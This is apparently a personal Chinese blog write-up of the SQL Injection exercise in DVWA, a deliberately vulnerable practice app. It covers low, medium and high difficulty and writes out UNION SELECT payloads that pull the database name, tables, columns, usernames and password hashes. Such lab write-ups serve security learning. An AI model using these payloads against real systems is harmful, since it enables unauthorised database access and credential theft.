#笔记(二十八)#dvwa漏洞SQL Injection wp

SQL Injection

low
  1. 查看源代码,没有过滤
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  2. 用1试没问题,1’不行,1’‘和1’#都没问题
  3. 先试一下爆库1’ union select 1,database()#,可以看到有回显,目前数据库dvwa
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  4. 爆表 1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#,能看到有个user的表
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  5. 列 1’ union select 1,column_name from information_schema.columns where table_name=‘users’#可以看到里面最重要的password列
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  6. 1’ union select 1,concat(user) from users#得到用户名
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  7. 1’ union select 1,concat(password) from users#得到密码
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  8. 对应输一下,发现emmmmm要解密md5,试一下gordonb的密码abc123
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  9. 心力憔悴.jpg
medium
  • emmmmm换了形式,不能get进去了
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • 先看代码,看见一个不可爱的函数mysql_real_escape_string(),还有一个提示,post上去
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • 抓包后,能看见注入方式id=1&Submit=Submit
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • 所以试一试id=1 union select 1,database()# &Submit=Submit
    (因为’不能用,所以直接去掉)
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • 其他的和low一样,爆出来users和password后,对照了一下,是一样的
    #笔记(二十八)#dvwa漏洞SQL Injection wp

high

  • 点进去弹出来一个框,???,似乎是防SQLmap的
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • 代码里面,一个SESSION百度完是弹出那个框框数据不丢失用的(大概),一个就是LIMIT 1,强制 SELECT 语句返回指定的记录数,具体的意思只能说半知半解,但对于漏洞来说,没有影响???
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • 熟悉的图片
    #笔记(二十八)#dvwa漏洞SQL Injection wp
  • emmmmm个人感觉,这个题可能就是想让我们好好理解LIMIT用法,包括简化等等